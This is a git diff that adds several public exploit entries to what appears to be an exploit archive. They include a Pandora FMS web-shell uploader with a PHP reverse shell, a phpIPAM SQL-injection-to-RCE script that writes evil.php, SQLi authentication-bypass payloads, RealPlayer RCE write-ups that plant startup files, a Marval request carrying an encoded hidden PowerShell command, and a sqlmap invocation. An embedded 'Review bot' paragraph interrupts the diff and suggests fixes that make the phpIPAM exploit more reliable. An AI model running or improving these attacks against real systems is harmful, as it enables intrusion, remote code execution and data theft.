name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n' + + # Try to upload the PHP web shell to the server + try: + response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False) + except: + print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}") + exit() + statusCode=response.status_code + if statusCode == 200: + print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}") + else: + print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}") + exit() + loading(15) + + print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}") + loading(15) + + # Print web shell location if in web shell mode + if exploitMode == "web": + print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}") + print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n") + + # Run custom command on web shell if in command mode + if exploitMode == "command": + response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}') + print(f"{color.blue}SUCCESS: {color.green}Command executed! 
Printing response below:{color.no}\n") + print(response.text) + + # Run reverse shell command if in reverse shell mode + if exploitMode == "shell": + shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'" + try: + requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1) + print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n") + except: + print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n") + + exit() + +if __name__ == "__main__": + + args = ['-h','-t','-u','-p','-s','-c','-w'] + modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'} + + # Initialize starting variables + targetIP = None + targetPort = None + targetUser = None + targetPass = None + targetSess = None + command = None + localIP = None + localPort = None + webName = "unicord.php" # Default web shell file name + exploitMode = "web" # Default to web shell mode + + # Print help if specified or if a target or authentication is not provided + if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv): + help() + + # Collect target IP and port from CLI + if args[1] in sys.argv: + try: + if "-" in sys.argv[sys.argv.index(args[1]) + 1]: + raise + targetIP = sys.argv[sys.argv.index(args[1]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t \"{color.no}") + exit() + try: + if "-" in sys.argv[sys.argv.index(args[1]) + 2]: + raise + targetPort = sys.argv[sys.argv.index(args[1]) + 2] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a target port! 
\"-t \"{color.no}") + exit() + + # Collect target username and password from CLI + if args[2] in sys.argv: + try: + if "-" in sys.argv[sys.argv.index(args[2]) + 1]: + raise + targetUser = sys.argv[sys.argv.index(args[2]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u \"{color.no}") + exit() + try: + if "-" in sys.argv[sys.argv.index(args[2]) + 2]: + raise + targetPass = sys.argv[sys.argv.index(args[2]) + 2] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u \"{color.no}") + exit() + + # Collect PHPSESSID from CLI, if specified + if args[3] in sys.argv: + try: + if "-" in sys.argv[sys.argv.index(args[3]) + 1]: + raise + targetSess = sys.argv[sys.argv.index(args[3]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p \"{color.no}") + exit() + + # Set reverse shell mode from CLI, if specified + if args[4] in sys.argv: + exploitMode = "shell" + try: + if "-" in sys.argv[sys.argv.index(args[4]) + 1]: + raise + localIP = sys.argv[sys.argv.index(args[4]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s \"{color.no}") + exit() + try: + if "-" in sys.argv[sys.argv.index(args[4]) + 2]: + raise + localPort = sys.argv[sys.argv.index(args[4]) + 2] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s \"{color.no}") + exit() + exploit(exploitMode,targetSess) + + # Set custom command mode from CLI, if specified + elif args[5] in sys.argv: + exploitMode = "command" + try: + if sys.argv[sys.argv.index(args[5]) + 1] in args: + raise + command = sys.argv[sys.argv.index(args[5]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a custom command! 
\"-c \"{color.no}") + exit() + exploit(exploitMode,targetSess) + + # Set web shell mode from CLI, if specified + elif args[6] in sys.argv: + exploitMode = "web" + try: + if sys.argv[sys.argv.index(args[6]) + 1] in args: + raise + if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]: + webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php" + else: + webName = sys.argv[sys.argv.index(args[6]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c \"{color.no}") + exit() + exploit(exploitMode,targetSess) + + # Run with default web shell mode if no mode is specified + else: + exploit(exploitMode,targetSess) \ No newline at end of file diff --git a/exploits/php/webapps/50963.py b/exploits/php/webapps/50963.py new file mode 100755 index 000000000..8e72308cd --- /dev/null +++ b/exploits/php/webapps/50963.py 
@@ -0,0 +1,88 @@
+# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-04-10
+# Exploit Author: Guilherme '@behiNdyk1' Alves
+# Vendor Homepage: https://phpipam.net/
+# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5
+# Version: 1.4.5
+# Tested on: Linux Ubuntu 20.04.3 LTS
+
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from sys import exit, argv
+from termcolor import colored
+
+banner = """
+█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█ ▄█ ░ █░█ ░ █▀ █▀ █▀█ █░░ █ ▀█▀ █▀█ █▀█ █▀▀ █▀▀
+█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█ ░█ ▄ ▀▀█ ▄ ▄█ ▄█ ▀▀█ █▄▄ █ ░█░ █▄█ █▀▄ █▄▄ ██▄
+
+█▄▄ █▄█ █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀
+█▄█ ░█░ █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n"""
+print(banner)
+
+parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")
+
+parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)
+parser.add_argument("-usr", type=str, help="Username to log in as", required=True)
+parser.add_argument("-pwd", type=str, help="User's password", required=True)
+parser.add_argument("-cmd", type=str, help="Command to execute", default="id")
+parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")
+parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")
+args = parser.parse_args()
+
+url = args.url
+username = args.usr
+password = args.pwd
+command = args.cmd
+path = args.path
+
+# Validating url
+if url.endswith("/"):
+ url = url[:-1]
+if not url.startswith("http://") and not url.startswith("https://"):
+ print(colored("[!] 
Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))
+ exit()
+
+def login(url, username, password):
+ """Takes an username and a password and tries to execute a login (IPAM)"""
+ data = {
+ "ipamusername": username,
+ "ipampassword": password
+ }
+ print(colored(f"[...] Trying to log in as {username}", "blue"))
+ r = requests.post(f"{url}/app/login/login_check.php", data=data)
+ if "Invalid username or password" in r.text:
+ print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))
+ exit()
+ else:
+ print(colored("[+] Login successful!", "green"))
+ return str(r.cookies['phpipam'])
+
+auth_cookie = login(url, username, password)
+
+def exploit(url, auth_cookie, path, command):
+ print(colored("[...] Exploiting", "blue"))
+ vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"
+ data = {
+ "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",
+ "bgp_id": "1"
+ }
+ cookies = {
+ "phpipam": auth_cookie
+ }
+ requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)
+ test = requests.get(f"{url}/evil.php")
+ if test.status_code != 200:
+ return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools§ion=routing&subnetId=bgp&sPage=1", "red"))
+ if "--shell" in argv:
+ while True:
+ command = input("Shell> ")
+ r = requests.get(f"{url}/evil.php?cmd={command}")
+ print(r.text)
+ else:
+ print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))
+ r = requests.get(f"{url}/evil.php?cmd={command}")
+ print(f"\n\n[+] Output:\n{r.text}")
+
+exploit(url, auth_cookie, path, command)
\ No newline at end of file
diff --git a/exploits/php/webapps/50965.txt b/exploits/php/webapps/50965.txt
new file mode 100644
index 000000000..03985f0fe
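Review bot: The `#!/usr/bin/env python3` shebang is placed after the header comment block, so it is inert and the `./exploit.py` invocation shown in the argparse `usage` string fails unless the interpreter is named explicitly; it belongs on the first line of the file. `--shell` is declared through argparse with `nargs="?"` but its parsed value is never read — `exploit()` tests `"--shell" in argv` instead — so the parser's option is dead weight and the two mechanisms can disagree; declare it as `parser.add_argument("--shell", action="store_true", help="Spawn a shell (non-interactive)")` and pass `args.shell` into `exploit()`. In `login()`, the success branch returns `r.cookies['phpipam']`, which raises a bare `KeyError` whenever the server answers with anything other than the one string-matched failure page (a redirect, a lockout notice, a renamed cookie); guard it with `if "phpipam" not in r.cookies:` and report the condition before exiting. None of the `requests` calls pass `timeout=`, so an unresponsive host hangs the script indefinitely.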
--- /dev/null
+++ b/exploits/php/webapps/50965.txt
@@ -0,0 +1,27 @@
+# Exploit Title: ChurchCRM 4.4.5 - SQLi
+# Exploit Author: nu11secur1ty
+# Date: 05.11.2022
+# Vendor: https://churchcrm.io/
+# Software: https://github.com/ChurchCRM/CRM
+# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
+
+## Description:
+There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php.
+
+[+] Payloads:
+
+```mysql
+---
+Parameter: PersonID (GET)
+ Type: boolean-based blind
+ Title: Boolean-based blind - Parameter replace (original value)
+ Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE
+(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: PersonID=1 AND (SELECT 7116 FROM
+(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
+---
+
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/50966.txt b/exploits/php/webapps/50966.txt
new file mode 100644
index 000000000..381efea04
--- /dev/null
+++ b/exploits/php/webapps/50966.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass
+# Date: 12/06/2022
+# Exploit Author: twseptian
+# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
+# Version: v1.0
+# Tested on: Kali Linux
+
+# Vulnerable code
+line 9 in file "/oahms/admin/login.php"
+$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");
+
+# Steps of reproduce:
+1. Go to the admin login page http://localhost/oahms/admin/login.php
+2. sqli payload: admin' or '1'='1';-- -
+3. password: password
+
+# Proof of Concept
+
+POST /oahms/admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/oahms/admin/login.php
+Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=
\ No newline at end of file
diff --git a/exploits/windows/local/50953.txt b/exploits/windows/local/50953.txt
new file mode 100644
index 000000000..4231e19ed
--- /dev/null
+++ b/exploits/windows/local/50953.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
+# Google Dork: n/a
+# Date: May 31, 2022
+# Exploit Author: Eduardo Braun Prado
+# Vendor Homepage: http://real.com/
+# Software Link: http://real.com/
+# Version: v.20.0.8.310
+# Tested on: Windows 7, 8.1, 10
+# CVE : N/A
+
+Full PoC: https://github.com/Edubr2020/RealPlayer_G2_RCE
+
+Real Player G2 Control component contains a remote code execution vulnerability because it allows 'javascript:' URIs to be passed as the argument, which
+is usually not safe because in some scenarios could allow injection of script code in arbitrary domains (Universal Cross Site Scripting - uXSS) which can potentially be used to eg. steal cookies among other things.
+By setting the 'URL' parameter to 'javascript:' URI and the 'target' parameter to an 'iframe' html element, it´s possible to cause javascript code to run in the context of a local error page displayed after using the very same
+Control to navigate to an invalid URI such as 'mhtml:http://%SERVER%/frame.htm': when an 'mhtml:' URI is invoked by MS IE rendering engine, it expects an MHTML file with an extension whose MIME type is set to "message/rfc822", which is the
+case for '.mht' files; '.htm' files have its MIME set to 'text/html' and thus IE will cancel loading the document and display a local error page (navigation cancelled). The local error page address is 'res://ieframe.dll/navcancl.htm' which belongs to the
+'My computer' security zone of IE / Windows which allows reading of arbitrary local files and also arbitrary code execution by design.
+Prohibiting the 'javascript:' URI in the control mitigates the issue.
+
+The PoC uses the 'SYSMON' ActiveX control to plant an HTA file to the user´s startup folder, which will be executed on next logon or boot. an HTA file can contain code to eg. download or extract an embedded EXE file and run it. 
+The PoC assumes Real Player has its current working directory set to a subdirectory of the user´s home directory. Upon downloading files using eg. web browsers, they will be downloaded to the user´s 'Downloads' folder by default, so we don´t need to retrieve the Windows user name
+to be able to plant the HTA file in the startup folder. This is just for convenience purposes as it´s possible to retrieve this info through a variety of ways, including the MS Web Browser ActiveX.
+
+Vulnerability can be exploited by opening a Real Player playlist file such as RAM files.
+
+To reproduce the issue, do the following:
+
+a) Setup a web server
+b) on the web server root directory, extract the "RP_G2" folder to it.
+c) open the just extracted "RP_G2" folder and then open the following files in a text editor:
+"poc.htm", "sm_rpx.js", "start.ram". Just replace every occurance of the string %SERVER% with the actual web server´s IP address (on each of the files)
+d) make sure the web server is accessible and all involved files too. on MS IIS web server you may need to add a new extension and associate it with a MIME type, so do it to associate the .RAM extension with the MIME "audio/x-pn-realaudio".
+e) on the client side (victim), open the web browser and download the "start.ram" file (or can be accessed eg. using a URL protocol such as 'rtsp:') and open it. You should see an HTA file being planted in the user´s startup folder after a few seconds.
+
+Note: to open startup folder do this: open the "Run" menu and then type:
+
+shell:Startup
\ No newline at end of file
diff --git a/exploits/windows/local/50954.txt b/exploits/windows/local/50954.txt
new file mode 100644
index 000000000..3d8b7f3b9
--- /dev/null
+++ b/exploits/windows/local/50954.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
+# Google Dork: n/a
+# Date: May 31, 2022
+# Exploit Author: Eduardo Braun Prado
+# Vendor Homepage: http://real.com/
+# Software Link: http://real.com/
+# Version: ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
+# Tested on: Windows 7, 8.1, 10
+# CVE : N/A
+
+PoC: https://github.com/Edubr2020/RP_Import_RCE/raw/main/RP_Import_RCE.zip
+vídeo: https://youtu.be/CONlijEgDLc
+
+Real Player uses Microsoft Internet Explorer functionality and exposes properties and methods through a special mean which is application specific:
+
+The 'external' object and it exposes several custom methods and properties.
+
+The 'Import()' method is handled in unsafe way regarding the 'Copy to My Music' parameter, which allows for arbitrary file types downloading
+which could be unsafe as only audio/image/video types should be allowed to download to the user´s disk. Additionally it does not properly sanitize file paths
+allowing planting of arbitrary files on arbitrary locations. Even though it displays an error because it cannot render the downloaded file, the file remains until the user
+closes the dialog box. Additionally when opening new windows, Real Player looks for an old, obsolete IE library (shdoclc.dll), which can also be abused to run code automatically without needing to wait
+until reboot (true when file is planted in 'startup' folder).
+
+The attacker needs to host the files to be copied/downloaded in an SMB or WebDav share.
+The directory 'appdata' must be placed in the share's root.
+
+The PoC will drop 'shdoclc.dll' (has simple code to run 'cmd.exe' at 'DllMain()' for demonstration purposes) to the user´s 'windowsapps' folder and 'write.exe' to 'startup' folder, so it works universally (any Windows version from at least XP up to 11)
+
+tested on RP ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309
\ No newline at end of file
diff --git a/exploits/windows/local/50959.txt b/exploits/windows/local/50959.txt
new file mode 100644
index 000000000..2393f5796
--- /dev/null
+++ b/exploits/windows/local/50959.txt
@@ -0,0 +1,29 @@
+# Exploit Title: HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
+# Date: 2022-06-06
+# Exploit Author: Ali Alipour
+# Vendor Homepage: https://support.hp.com/us-en/document/c01998934
+# Software Link: https://support.hp.com/us-en/drivers/selfservice/hp-laserjet-pro-m1212nf-multifunction-printer-series/3965847
+# Version: 20180815_1
+# Tested on: Windows 10 Pro x64
+# CVE : N/A
+
+# Service info:
+
+C:\Users\Wr3ak>sc qc "HPM1210RcvFaxSrvc"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: HPM1210RcvFaxSrvc
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\HP\HP LaserJet M1210 MFP Series\ReceiveFaxUtility.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : HP LaserJet Professional M1210 MFP Series Receive Fax Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/remote/50956.txt b/exploits/windows/remote/50956.txt
new file mode 100644
index 000000000..fc47b5bb3
--- /dev/null
+++ b/exploits/windows/remote/50956.txt
@@ -0,0 +1,28 @@ +# Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated) +# Date: 27/5/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://www.marvalnorthamerica.com/ +# Software Link: https://www.marvalnorthamerica.com/ +# Version: v14.19.0.12476 +# Tested on: Windows +# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rce + +POST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2 +Host: MSMHandler.io +Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 +Accept: application/json, text/javascript, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 456 +Origin: https://MSMHandler.io +Dnt: 1 +Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers + 
+type=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true \ No newline at end of file diff --git a/exploits/windows/remote/50957.txt b/exploits/windows/remote/50957.txt new file mode 100644 index 000000000..5a5cad9ed --- /dev/null +++ b/exploits/windows/remote/50957.txt @@ -0,0 +1,18 @@ +# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF) +# Date: 27/5/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://www.marvalnorthamerica.com/ +# Software Link: https://www.marvalnorthamerica.com/ +# Version: v14.19.0.12476 +# Tested on: Windows +# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY +# 2FA Bypass: + + + + +
+ +
+ + \ No newline at end of file diff --git a/exploits/windows/remote/50958.txt b/exploits/windows/remote/50958.txt new file mode 100644 index 000000000..d00c6196d --- /dev/null +++ b/exploits/windows/remote/50958.txt 
@@ -0,0 +1,57 @@
+# Exploit Title: Virtua Software Cobranca 12S - SQLi
+# Shodan Query: http.favicon.hash:876876147
+# Date: 13/08/2021
+# Exploit Author: Luca Regne
+# Vendor Homepage: https://www.virtuasoftware.com.br/
+# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe
+# Version: 12S
+# Tested on: Windows Server 2019
+# CVE : CVE-2021-37589
+------------------------------------------------------------------------
+
+
+## Description
+A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter.
+
+## Request PoC
+```
+POST /controller/login.php?acao=autenticar HTTP/1.1
+Host: redacted.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 37
+Connection: close
+Cookie: origem_selecionado=; PHPSESSID=
+
+idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario
+
+```
+
+This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. 
+
+```
+POST /controller/login.php?acao=autenticar HTTP/1.1
+Host: redacted.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 37
+Connection: close
+Cookie: origem_selecionado=; PHPSESSID=
+
+idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario
+
+```
+
+## Exploit
+Save the request from burp to file
+```bash
+python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent
+```
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8585cecdc..4a7c3cc8c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11486,6 +11486,9 @@ id,file,description,date,author,type,platform,port
 50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows,
 50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux,
 50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows,
+50953,exploits/windows/local/50953.txt,"Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
+50954,exploits/windows/local/50954.txt,"Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
+50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18701,6 +18704,12 @@ id,file,description,date,author,type,platform,port
 50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Bryan Leong",remote,hardware,
 50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",1970-01-01,LiquidWorm,remote,hardware,
 50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",1970-01-01,"Ahmed Alroky",remote,hardware,
+50956,exploits/windows/remote/50956.txt,"Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Momen Eldawakhly",remote,windows,
+50958,exploits/windows/remote/50958.txt,"Virtua Software Cobranca 12S - SQLi",1970-01-01,"Luca Regne",remote,windows,
+50957,exploits/windows/remote/50957.txt,"Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Momen Eldawakhly",remote,windows,
+50960,exploits/hardware/remote/50960.py,"Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Filip Carlsson",remote,hardware,
+50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Tomas Melicher",remote,hardware,
+50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45015,3 +45024,10 @@ id,file,description,date,author,type,platform,port
 50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php,
 50951,exploits/php/webapps/50951.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Sanjay Singh",webapps,php,
 50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",1970-01-01,"Fellipe Oliveira",webapps,java,
+50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",1970-01-01,"Andrea Intilangelo",webapps,multiple,
+50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UNICORD,webapps,php,
